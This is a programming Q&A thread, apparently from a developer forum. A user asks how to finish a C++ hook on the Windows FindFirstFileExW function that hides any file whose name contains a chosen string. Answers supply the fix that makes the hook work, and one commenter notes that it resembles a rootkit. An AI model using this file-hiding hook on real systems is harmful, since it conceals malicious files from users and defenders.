# Casting WIN32_FIND_DATA to LPVOID

Tags: c++, winapi, casting, hook

How can I cast WIN32_FIND_DATA to LPVOID?

I am trying to hook a function but I am unable to cast WIN32_FIND_DATA to LPVOID

this my function:

```
/* New FindFirstFileW Function */
HANDLE WINAPI newFindFirstFileExW(__in LPCTSTR lpFileName, __in FINDEX_INFO_LEVELS fInfoLevelId, __out LPVOID lpFindFileData,  __in FINDEX_SEARCH_OPS fSearchOp,
                                     __reserved  LPVOID lpSearchFilter, __in DWORD dwAdditionalFlags)
{
    HANDLE hFind;
    WIN32_FIND_DATA findData;
    BOOL ret;
    hFind = FindFirstFileExW(lpFileName, fInfoLevelId, &findData, fSearchOp, lpSearchFilter, dwAdditionalFlags);

    if (hFind == INVALID_HANDLE_VALUE)
        return hFind;

    // if first file name starts with HIDE_NAME_W skip the file
    if (wcsstr(findData.cFileName, HIDE_NAME_W) != 0)
    {
        ret = true;
        do {
            ret = FindNextFileW(hFind, &findData);
        } while (!ret && wcsstr(findData.cFileName, HIDE_NAME_W) != 0);

        if (!ret)
        {
            SetLastError(ERROR_FILE_NOT_FOUND);
            return INVALID_HANDLE_VALUE;
        }
    }

    lpFindFileData = reinterpret_cast<LPVOID>(findData);
    return hFind;
}
```

**EDIT:**
Thank you all for your help its working now my problem was that i forgot to change
the called function.. i was hooking to FindFirstFileExW some other function

Comment: You're missing an ampersand - &

Comment: Doesn't this come under a rootkit?

Answer (score 2, accepted):

You have to copy the WIN32_FIND_DATA to the memory at lpFindFileData.
The line before the last return should look like this:

```
*reinterpret_cast<WIN32_FIND_DATA*>(lpFindFileData) = findData;
```

Comment: my hook is set correctly since when im trying to hook other functions it works fine.. this is the only function who causes me problems

Comment: nvm its working now thank you! the reason is in the post :) !

Answer (score 2):

`lpFindFileData = reinterpret_cast<LPVOID>(findData);`

`findData` is not a pointer in this context, it's an actual `WIN32_FIND_DATA`.

Do this instead:

`lpFindFileData = reinterpret_cast<LPVOID>(&findData);`

Comment: for some reason it causing cmd.exe process to crash when i type "dir" if i use this type of cast

Comment: nvm its working now thank you! the reason is in the post :) !